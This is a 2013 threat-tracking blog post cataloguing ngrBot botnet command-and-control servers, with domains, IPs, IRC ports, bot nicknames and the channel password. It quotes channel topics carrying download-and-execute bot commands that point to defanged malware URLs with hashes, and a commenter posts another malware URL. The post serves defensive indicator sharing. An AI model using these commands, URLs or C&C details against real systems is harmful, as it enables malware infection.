ads.pr4d.tk/teams.xsaudix.net/y.servicesql.info(ngrBot hosted in United States Scranton Network Operations Center Inc.)

By Pig, January 30, 2013

This botnet was found from anonymous guy here thanks to him for the submition

Resolved : [ads.pr4d.tk] To [64.120.186.229]
Resolved : [teams.xsaudix.net] To [64.120.186.230] arab heckers
Resolved : [y.servicesql.info] To [64.120.186.228]

Server: 64.120.186.229:1433
Username: zdbcuzs
Nickname: n{DE|XPa}zdbcuzs
Channel: #tmw5 (Password: ngrBot)
Channeltopic: :!u5 hxxp://bmc.linkpc.net/download/s1.exe 5b8fe0ee31617ee9596a5861a2192304 !u5 hxxp://bmc.linkpc.net/s1cr.exe cdfc01b434fc787d487ce088dd391e0b !u6 hxxp://bmc.linkpc.net/chat.exe 7140176e63651b027fd5f3b19252c4bf

Server: 64.120.186.228:1434
Username: mmgamzu
Nickname: n{DE|XPa}mmgamzu
Channel: #mrag (Password: ngrBot)
Channeltopic: :~u5 hxxp://bmc.linkpc.net/s1cr.exe cdfc01b434fc787d487ce088dd391e0b ~mod usbi on ~mod bdns on

hosting infos:
http://whois.domaintools.com/64.120.186.230

http://whois.domaintools.com/64.120.186.229

Categories: Uncategorized

Tags: ngrBot

Previous postdemoralize.biz(Andromeda hosted in Germany Frankfurt Am Main Voxility S.r.l.)

Next postmonstercvv.cc (Multilocker 3 winlocker hosted by altushost.com)

2 Comments

Jorgee - January 31, 2013 at 6:34 pm

Pig check this binary I found yesterday 😉
hxxp://thomas-stelthove.de/1.exe

Pig - January 31, 2013 at 6:40 pm

thank you Jorgee for the sample will check this now

dd.sult4n.net(ngrBot hosted in United States Chicago Steadfast Networks)

178.86.23.225(ngrBot hosted in Ukraine Odessa Tehnologii Budushego Llc)

t.baerr01.com (Ngrbot irc botnet hosted by Chinanet)

2 Comments

Jorgee - January 31, 2013 at 6:34 pm

Pig - January 31, 2013 at 6:40 pm

Comments are closed